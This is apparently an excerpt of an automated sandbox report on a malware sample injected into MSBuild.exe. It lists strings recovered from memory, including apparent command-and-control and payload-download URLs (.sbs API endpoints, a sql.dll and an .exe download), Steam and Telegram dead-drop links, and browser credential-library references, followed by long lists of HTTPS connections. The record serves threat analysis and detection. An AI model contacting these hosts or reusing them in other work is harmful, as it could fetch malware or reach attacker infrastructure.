Source: f1r6P3j3g7.exe, f1r6P3j3g7.exe, 00000000.00000002.1815003832.000000000091D000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000003.00000002.2174458155.0000000000494000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2174458155.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com:80
Source: MSBuild.exe, 00000003.00000002.2174458155.000000000048F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com:80/sql.dll
Source: f1r6P3j3g7.exe, 00000000.00000002.1815003832.000000000091D000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000003.00000002.2174458155.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com:80nfwqnfwovfdkhttps://steamcommunity.com/profiles/76561199780418869u5
Source: MSBuild.exe, 00000003.00000002.2174458155.0000000000494000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com:80t-Disposition:
Source: MSBuild.exe, 00000003.00000002.2174458155.000000000056B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2175828757.0000000000E08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nsdm.cumpar-auto-orice-tip.ro/ldms/a43486128347.exe
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nsdm.cumpar-auto-orice-tip.ro/ldms/a43486128347.exe-
Source: MSBuild.exe, 00000003.00000002.2174458155.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://nsdm.cumpar-auto-orice-tip.ro/ldms/a43486128347.exe1kkkk
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nsdm.cumpar-auto-orice-tip.ro/ldms/a43486128347.exe=
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: MSBuild.exe, MSBuild.exe, 00000003.00000002.2215872054.000000006CC1D000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: MSBuild.exe, 00000003.00000002.2188526414.000000001D69D000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2182419932.00000000176F7000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.3.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: ECGIII.3.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2175828757.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2175828757.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp, JKECFC.3.dr	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2175828757.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2175828757.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp, JKECFC.3.dr	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: ECGIII.3.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: ECGIII.3.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: ECGIII.3.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2175828757.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2175828757.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp, JKECFC.3.dr	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2175828757.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2175828757.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp, JKECFC.3.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: ECGIII.3.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: ECGIII.3.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: ECGIII.3.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: MSBuild.exe, 0000000B.00000002.2205846539.000000000115F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frizzettei.sbs/api
Source: MSBuild.exe, 0000000B.00000002.2205846539.000000000115F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frizzettei.sbs/apiwDVP
Source: JKECFC.3.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: https://mozilla.org0/
Source: f1r6P3j3g7.exe, f1r6P3j3g7.exe, 00000000.00000002.1815003832.000000000091D000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000003.00000002.2174458155.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
Source: HJEHIJ.3.dr	String found in binary or memory: https://support.mozilla.org
Source: HJEHIJ.3.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: HJEHIJ.3.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: MSBuild.exe, 00000003.00000002.2181758591.00000000173BA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2174458155.000000000056B000.00000040.00000400.00020000.00000000.sdmp, GIIEGH.3.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: GIIEGH.3.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: MSBuild.exe, 00000003.00000002.2174458155.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
Source: MSBuild.exe, 00000003.00000002.2181758591.00000000173BA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2174458155.000000000056B000.00000040.00000400.00020000.00000000.sdmp, GIIEGH.3.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: GIIEGH.3.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: MSBuild.exe, 00000003.00000002.2174458155.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
Source: f1r6P3j3g7.exe, f1r6P3j3g7.exe, 00000000.00000002.1815003832.000000000091D000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000003.00000002.2174458155.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/ae5ed
Source: f1r6P3j3g7.exe, 00000000.00000002.1815003832.000000000091D000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000003.00000002.2174458155.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/ae5edu55uhttps://steamcommunity.com/profiles/76561199780418869sql.dllsqlp.dllMozilla/5.
Source: MSBuild.exe, 0000000B.00000002.2205846539.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wickedneatr.sbs/api
Source: MSBuild.exe, 0000000B.00000002.2205846539.0000000001153000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wickedneatr.sbs/cDWE
Source: MSBuild.exe, 0000000B.00000002.2205846539.0000000001173000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wickedneatr.sbs/pi
Source: MSBuild.exe, 0000000B.00000002.2205846539.0000000001186000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wickedneatr.sbs:443/api
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2175828757.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2175828757.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp, JKECFC.3.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: ECGIII.3.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2175828757.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2175828757.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp, JKECFC.3.dr	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: ECGIII.3.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: HJEHIJ.3.dr	String found in binary or memory: https://www.mozilla.org
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2181758591.00000000173BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: HJEHIJ.3.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/ost.exe
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2181758591.00000000173BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: HJEHIJ.3.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/xe
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2181758591.00000000173BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: HJEHIJ.3.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
Source: HJEHIJ.3.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2181758591.00000000173BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
Source: HJEHIJ.3.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 53684 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53649 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53903
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53902
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53901
Source: unknown	Network traffic detected: HTTP traffic on port 53650 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53900
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53907
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53906
Source: unknown	Network traffic detected: HTTP traffic on port 53730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53905
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53904
Source: unknown	Network traffic detected: HTTP traffic on port 53683 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53909
Source: unknown	Network traffic detected: HTTP traffic on port 53808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53908
Source: unknown	Network traffic detected: HTTP traffic on port 53672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53661 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53902 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53659 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53891 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53648 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53660 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53693 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53901 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53682 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53727
Source: unknown	Network traffic detected: HTTP traffic on port 53755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53847
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53846
Source: unknown	Network traffic detected: HTTP traffic on port 53698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53724
Source: unknown	Network traffic detected: HTTP traffic on port 53841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53729
Source: unknown	Network traffic detected: HTTP traffic on port 53858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53728
Source: unknown	Network traffic detected: HTTP traffic on port 53732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53849
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53840
Source: unknown	Network traffic detected: HTTP traffic on port 53870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53721
Source: unknown	Network traffic detected: HTTP traffic on port 53778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53841
Source: unknown	Network traffic detected: HTTP traffic on port 53790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53851
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53850
Source: unknown	Network traffic detected: HTTP traffic on port 53641 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53687 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53852
Source: unknown	Network traffic detected: HTTP traffic on port 53744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53652 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53869
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53868
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53867
Source: unknown	Network traffic detected: HTTP traffic on port 53709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53860
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53866
Source: unknown	Network traffic detected: HTTP traffic on port 53686 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53864
Source: unknown	Network traffic detected: HTTP traffic on port 53908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53863
Source: unknown	Network traffic detected: HTTP traffic on port 53743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53653 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53879
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53757
Source: unknown	Network traffic detected: HTTP traffic on port 53840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53878
Source: unknown	Network traffic detected: HTTP traffic on port 53710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53873
